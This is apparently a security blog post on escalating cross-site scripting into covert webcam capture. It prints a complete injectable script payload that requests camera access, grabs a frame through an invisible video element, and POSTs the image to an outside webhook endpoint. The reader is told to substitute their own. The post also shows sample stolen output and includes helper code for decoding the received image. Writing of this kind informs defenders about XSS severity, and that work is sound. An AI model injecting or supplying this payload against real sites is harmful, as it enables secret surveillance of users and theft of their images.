Cross-site scripting (XSS) is often rated a low-to-moderate threat, depending on the type of data an attacker can steal. Traditionally, XSS attacks are used to steal cookies or session tokens, or to display convincing phishing dialogs. In this post, however, we'll explore how XSS can be leveraged to capture images from a victim's camera using HTML5 and JavaScript. This is an unexpected and intrusive escalation of impact that could surprise both developers and security professionals.
Introducing Photo/Video Capture via XSS
The snippet below demonstrates how JavaScript can capture a single frame from a victim's webcam. Imagine a scenario where an attacker injects this payload into a vulnerable website, taking advantage of the camera permission an unsuspecting user grants to that site. Replace the webhook URL with your own.
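<script>
  // Off-DOM elements: the video receives the stream, the canvas grabs one frame.
  const v = document.createElement('video'),
        c = document.createElement('canvas');
  // Request camera access; this triggers the browser's permission prompt.
  navigator.mediaDevices?.getUserMedia({video:1})
    .then(s => {
      v.srcObject = s;
      v.play();
      // Wait for the first frame, then one more second before capturing.
      v.onloadeddata = () => setTimeout(() => {
        // Size the canvas to the camera's native resolution and copy the frame.
        c.width = v.videoWidth;
        c.height = v.videoHeight;
        c.getContext('2d').drawImage(v, 0, 0);
        // POST the frame as a base64 JPEG data URL, plus a timestamp.
        fetch('https://webhook.site/{webhook-id}/', {
          method: 'POST',
          headers: {'Content-Type': 'application/json'},
          body: JSON.stringify({
            image: c.toDataURL('image/jpeg'),
            timestamp: new Date().toISOString()
          })
        });
        // Release the camera.
        s.getTracks().forEach(t => t.stop());
      }, 1000);
    })
    .catch(e => alert('Camera access error'));
</script>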
Sample Response
{"image":"data:image/jpeg;base64,/9j/4AA<<<....SNIP....>>>ioaRsmatrciRgOxOOKlxTNG9D//2Q==","timestamp":"2024-12-04T18:10:57.214Z"}
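To make the structure of that response concrete, here is a minimal sketch of how the body could be unpacked on the receiving side. The helper names parseDataUrl and looksLikeJpeg are hypothetical, and the body below is a four-byte stand-in rather than a real image. It relies on the fact that JPEG files begin with the bytes FF D8 FF, which is why the base64 string in the sample starts with /9j/.

```javascript
// Hypothetical helper: split a base64 data URL into its MIME type and raw bytes.
function parseDataUrl(dataUrl) {
  const match = /^data:([^;,]+);base64,(.*)$/s.exec(dataUrl);
  if (!match) throw new Error('not a base64 data URL');
  const [, mimeType, b64] = match;
  const binary = atob(b64); // one character per decoded byte
  const bytes = Uint8Array.from(binary, ch => ch.charCodeAt(0));
  return { mimeType, bytes };
}

// Hypothetical helper: JPEG files start with the bytes FF D8 FF.
function looksLikeJpeg(bytes) {
  return bytes.length >= 3 &&
    bytes[0] === 0xff && bytes[1] === 0xd8 && bytes[2] === 0xff;
}

// Illustrative body only: "/9j/4A==" decodes to FF D8 FF E0, not a full image.
const body = '{"image":"data:image/jpeg;base64,/9j/4A==","timestamp":"2024-12-04T18:10:57.214Z"}';
const { image, timestamp } = JSON.parse(body);
const { mimeType, bytes } = parseDataUrl(image);
console.log(mimeType, looksLikeJpeg(bytes), timestamp);
```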
Breakdown of the Attack
1. Requesting Webcam Access
The payload starts by creating a <video> element and a <canvas> element. It then requests access to the user's camera using navigator.mediaDevices.getUserMedia({video:1}). This call makes the victim's browser prompt for permission to access the webcam. If the user consents, the attacker's script gains access to the video feed.
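When access is not obtained, the promise returned by getUserMedia() rejects with a named error. The sketch below maps the common names to plain-language causes. The helper describeCameraError is hypothetical; the error names are the standard DOMException names used by getUserMedia(). Note also that navigator.mediaDevices is only defined in secure contexts (HTTPS or localhost).

```javascript
// Hypothetical helper: translate a getUserMedia() rejection into a readable cause.
function describeCameraError(err) {
  switch (err && err.name) {
    case 'NotAllowedError':
      return 'permission denied by the user or by policy';
    case 'NotFoundError':
      return 'no camera available';
    case 'NotReadableError':
      return 'camera is in use or failed to start';
    default:
      return 'unexpected error';
  }
}

// Stand-in error object; in a browser this would be the rejected DOMException.
console.log(describeCameraError({ name: 'NotAllowedError' }));
```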
2. Capturing and Processing a Frame
Once access is granted, the script starts playing the webcam feed in the <video> element, which is never attached to the page and therefore stays invisible. After a one-second delay, it captures a frame of the feed by drawing it onto the <canvas> element using drawImage().
3. Exfiltrating Data
The captured frame is converted to a data URL containing a base64-encoded JPEG image using c.toDataURL('image/jpeg'), and this encoded image is sent to an attacker-controlled endpoint via a fetch() POST request. This provides the attacker with a snapshot of whatever the victim's webcam was viewing at that moment.
Finally, the script releases the webcam by stopping all associated media tracks.
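Because the image travels as base64 text, the request body is roughly a third larger than the JPEG itself (4 characters for every 3 bytes). As a rough sketch, the hypothetical helper decodedSize below estimates the underlying image size from the data URL alone, assuming standard padded base64.

```javascript
// Hypothetical helper: number of bytes encoded by a padded base64 data URL.
function decodedSize(dataUrl) {
  const b64 = dataUrl.slice(dataUrl.indexOf(',') + 1);
  const padding = b64.endsWith('==') ? 2 : b64.endsWith('=') ? 1 : 0;
  return (b64.length / 4) * 3 - padding;
}

// Illustrative stand-in, not a real image.
console.log(decodedSize('data:image/jpeg;base64,/9j/4A=='));
```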
Real-World Impact
This kind of attack significantly increases the severity of XSS vulnerabilities. Not only can an attacker steal cookies and execute arbitrary JavaScript, they can also access the victim's webcam, a far more intrusive violation of user privacy.
It is important to note that this attack relies heavily on social engineering: the victim must allow camera access. However, because the injected script runs in the vulnerable site's origin, the permission prompt names that site rather than the attacker. If the user already trusts the page, they may be more inclined to grant access without a second thought, and if the site has previously been granted camera access, the browser may not prompt at all.